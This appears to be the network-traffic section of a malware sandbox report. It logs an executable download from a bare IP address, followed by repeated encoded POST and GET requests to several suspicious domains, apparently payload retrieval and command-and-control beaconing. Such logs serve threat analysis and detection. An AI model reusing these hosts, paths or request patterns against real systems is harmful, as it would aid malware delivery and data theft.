Network Analysis

GET /crypt/laser.exe HTTP/1.1 Host: 87.120.120.56 Connection: Keep-Alive

HTTP/1.1 200 OK Date: Fri, 07 Feb 2025 05:15:33 GMT Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12 Last-Modified: Mon, 03 Feb 2025 00:06:31 GMT ETag: "46a00-62d31aa2b0aa4" Accept-Ranges: bytes Content-Length: 289280 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: application/x-msdownload

POST /vhr7/ HTTP/1.1 Host: www.l63339.xyz Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Origin: http://www.l63339.xyz Referer: http://www.l63339.xyz/vhr7/ Content-Length: 196 Cache-Control: no-cache Connection: close Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0(iPad; U; CPU OS 8_1.1 like Mac OS X; en-us) AppleWebKit/533.17.8 (KHTML, like Gecko) Version/5.0.6 Mobile/8F191 Safari/6534.18.5

HTTP/1.1 302 Redirect Content-Type: text/html; charset=UTF-8 Location: https://wx.longwaysun.com/app/register.php?site_id=2239&topId=86884/vhr7/ Server: Microsoft-IIS/10.0 Date: Fri, 07 Feb 2025 05:16:40 GMT Connection: close Content-Length: 200

GET /vhr7/?8eahTb_=iaSfD1StI7hDT4qLO8uUiRMZCfzOjk7n7gYmLjmbAGxKTACTDmsojAseBTws2ae3nsJ7oX723eTW3ctEzpxpoAGWw5lYsZyjnFbtqE7RDBWvF3wnDTau3wgNIBcGnVL27k7EtEM=&00Dj=kNZ8XRK0WV HTTP/1.1 Host: www.l63339.xyz Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-US,en;q=0.5 Connection: close User-Agent: Mozilla/5.0(iPad; U; CPU OS 8_1.1 like Mac OS X; en-us) AppleWebKit/533.17.8 (KHTML, like Gecko) Version/5.0.6 Mobile/8F191 Safari/6534.18.5

HTTP/1.1 302 Redirect Content-Type: text/html; charset=UTF-8 Location: https://wx.longwaysun.com/app/register.php?site_id=2239&topId=86884/vhr7/ Server: Microsoft-IIS/10.0 Date: Fri, 07 Feb 2025 05:16:42 GMT Connection: close Content-Length: 200

GET /2022/sqlite-dll-win32-x86-3380000.zip HTTP/1.1 User-Agent: Mozilla/5.0(iPad; U; CPU OS 8_1.1 like Mac OS X; en-us) AppleWebKit/533.17.8 (KHTML, like Gecko) Version/5.0.6 Mobile/8F191 Safari/6534.18.5 Host: www.sqlite.org Connection: Keep-Alive Cache-Control: no-cache

HTTP/1.1 200 OK Connection: keep-alive Date: Fri, 07 Feb 2025 05:16:45 GMT Last-Modified: Sat, 12 Mar 2022 13:56:34 GMT Cache-Control: max-age=120 ETag: "m622ca692s8a577" Content-type: application/zip; charset=utf-8 Content-length: 566647

POST /k566/ HTTP/1.1 Host: www.tumbetgirislinki.fit Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Origin: http://www.tumbetgirislinki.fit Referer: http://www.tumbetgirislinki.fit/k566/ Content-Length: 3436 Cache-Control: no-cache Connection: close Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0(iPad; U; CPU OS 8_1.1 like Mac OS X; en-us) AppleWebKit/533.17.8 (KHTML, like Gecko) Version/5.0.6 Mobile/8F191 Safari/6534.18.5

HTTP/1.1 404 Not Found Date: Fri, 07 Feb 2025 05:17:10 GMT Content-Type: text/html Transfer-Encoding: chunked Connection: close Cache-Control: no-cache, no-store, must-revalidate Pragma: no-cache Expires: 0 cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=KY%2F5tznxvt2PtKG2nXg2tk8Zb0DH%2Btg%2F70M7Q%2BD5yhoRZogayHPdNrZXeVg52VfJcNDWpGJDJaJxvWwfLbbXAqZh0B71xuaskuHiz5kwIe5qeXoIQWkDdQoSeplJPoGX%2BVRB0ZHDv7GHNEY%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 90e0e97609c42f08-LAX Content-Encoding: gzip alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=130416&min_rtt=130416&rtt_var=65208&sent=3&recv=5&lost=0&retrans=0&sent_bytes=0&recv_bytes=4060&delivery_rate=0&cwnd=30&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"

POST /k566/ HTTP/1.1 Host: www.tumbetgirislinki.fit Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Origin: http://www.tumbetgirislinki.fit Referer: http://www.tumbetgirislinki.fit/k566/ Content-Length: 208 Cache-Control: no-cache Connection: close Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0(iPad; U; CPU OS 8_1.1 like Mac OS X; en-us) AppleWebKit/533.17.8 (KHTML, like Gecko) Version/5.0.6 Mobile/8F191 Safari/6534.18.5

HTTP/1.1 404 Not Found Date: Fri, 07 Feb 2025 05:17:13 GMT Content-Type: text/html Transfer-Encoding: chunked Connection: close Cache-Control: no-cache, no-store, must-revalidate Pragma: no-cache Expires: 0 cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=enbDJUniDIU8sYmNmi8bjd%2Bt0O%2FwG2r0e9Lww51uAcv6RH6zyMygChDE%2FNj2nS6qEFpMslxbihZO%2B%2Bnpm0wOKklxFARv6peWsiBC7Feyxfuo7s5H%2BRVOk5ZbfuBOhyPPjRcTPbKLXTpRNW8%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 90e0e9867a247c98-LAX Content-Encoding: gzip alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=133741&min_rtt=133741&rtt_var=66870&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=831&delivery_rate=0&cwnd=30&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"

GET /k566/?8eahTb_=RARW43WNMKajmHobr0h+FYOVnPeo69WXvXreCHJ6fEp5jkldk9mcfHn6UnU82+9OdsowyVV8wlYPh4e4mYqP64YSjghMuBr0WoXV5avhz1caW9rj8asJcaLGlYzIq2qtHDCYWJw=&00Dj=kNZ8XRK0WV HTTP/1.1 Host: www.tumbetgirislinki.fit Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-US,en;q=0.5 Connection: close User-Agent: Mozilla/5.0(iPad; U; CPU OS 8_1.1 like Mac OS X; en-us) AppleWebKit/533.17.8 (KHTML, like Gecko) Version/5.0.6 Mobile/8F191 Safari/6534.18.5

HTTP/1.1 404 Not Found Date: Fri, 07 Feb 2025 05:17:16 GMT Content-Type: text/html Transfer-Encoding: chunked Connection: close Accept-Ranges: bytes Cache-Control: no-cache, no-store, must-revalidate Pragma: no-cache Expires: 0 cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=he4vXBplks5zuoUf%2F0O0%2BRTYrZLan869CVw%2FTLPBMq04pGu0yOLXsByJGKlbZSaYKimmdogLUO9zIXyGp%2FlDNXR5qryyQFqowfRLxt3FW4%2FUYlokt9NNMNBsG0RvxGbARW8c%2FbtZtMgx2O4%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 90e0e9970b3e2f74-LAX alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=133891&min_rtt=133891&rtt_var=66945&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=567&delivery_rate=0&cwnd=30&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"

POST /jgkl/ HTTP/1.1 Host: www.lucynoel6465.shop Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Origin: http://www.lucynoel6465.shop Referer: http://www.lucynoel6465.shop/jgkl/ Content-Length: 3436 Cache-Control: no-cache Connection: close Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0(iPad; U; CPU OS 8_1.1 like Mac OS X; en-us) AppleWebKit/533.17.8 (KHTML, like Gecko) Version/5.0.6 Mobile/8F191 Safari/6534.18.5

HTTP/1.1 404 Not Found Date: Fri, 07 Feb 2025 05:17:21 GMT Content-Type: text/html Transfer-Encoding: chunked Connection: close cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=3si4GCkTUjbVcO8K59Bs3E3%2BcyCTy0ATU9SijbQk6XPg08b%2FUBea%2Fcp1pSjU549dk1pzTGxADKGkI9ay4AxsVpmytltEjNQdNRGCle5NePmT4UvNNlihvPHBfg8AhsleGcE8aCOPaHI%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 90e0e9c12b9e0928-LAX Content-Encoding: gzip alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=132071&min_rtt=132071&rtt_var=66035&sent=2&recv=5&lost=0&retrans=0&sent_bytes=0&recv_bytes=4051&delivery_rate=0&cwnd=30&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"

POST /jgkl/ HTTP/1.1 Host: www.lucynoel6465.shop Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Origin: http://www.lucynoel6465.shop Referer: http://www.lucynoel6465.shop/jgkl/ Content-Length: 208 Cache-Control: no-cache Connection: close Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0(iPad; U; CPU OS 8_1.1 like Mac OS X; en-us) AppleWebKit/533.17.8 (KHTML, like Gecko) Version/5.0.6 Mobile/8F191 Safari/6534.18.5

HTTP/1.1 404 Not Found Date: Fri, 07 Feb 2025 05:17:24 GMT Content-Type: text/html Transfer-Encoding: chunked Connection: close cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=HL2WFakGpA6bGZoH%2Bq%2BCfW9C0uOmOup%2ByU6VF4XmPHYnvZr4ZXgyD6MMAt9F7ksaRj1ny50y2xv%2FgnQ2pfKeRU%2FeUprn4K4w3OkLo1TosDCGfmTNYWQ6sK%2Btn12LxalT7ZCyyNpcRyA%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 90e0e9d1aeeb2b78-LAX Content-Encoding: gzip alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=132812&min_rtt=132812&rtt_var=66406&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=822&delivery_rate=0&cwnd=30&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"

GET /jgkl/?8eahTb_=hI+cEEoDMRK5HtHm9IZKcVLqeO4rH3Lo+nuR9x41ri89hVkyLZ4bcwu1mex5brSMZV4GWavlrf0/NsblmXI4eKNzhD3LBC/4pVsqqx1rwhcrHMghz/r2elc8myKvxM7B12e/f+g=&00Dj=kNZ8XRK0WV HTTP/1.1 Host: www.lucynoel6465.shop Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-US,en;q=0.5 Connection: close User-Agent: Mozilla/5.0(iPad; U; CPU OS 8_1.1 like Mac OS X; en-us) AppleWebKit/533.17.8 (KHTML, like Gecko) Version/5.0.6 Mobile/8F191 Safari/6534.18.5

HTTP/1.1 404 Not Found Date: Fri, 07 Feb 2025 05:17:27 GMT Content-Type: text/html Transfer-Encoding: chunked Connection: close cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Ho6Icol5KCF2EssmG2CtziL%2BTyf7I3Ve48gNEdaA%2FdU2ODw3ZgYdN0BFdWPGWlNC0WfWWFOUzfNM0GdhuvcuDLY0WPfucdvJlWhbfPuxuUrY5gomDu3sqdJOm1XbP9pnRSfnAvIvWEs%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 90e0e9e22ab07c83-LAX alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=132744&min_rtt=132744&rtt_var=66372&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=564&delivery_rate=0&cwnd=30&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"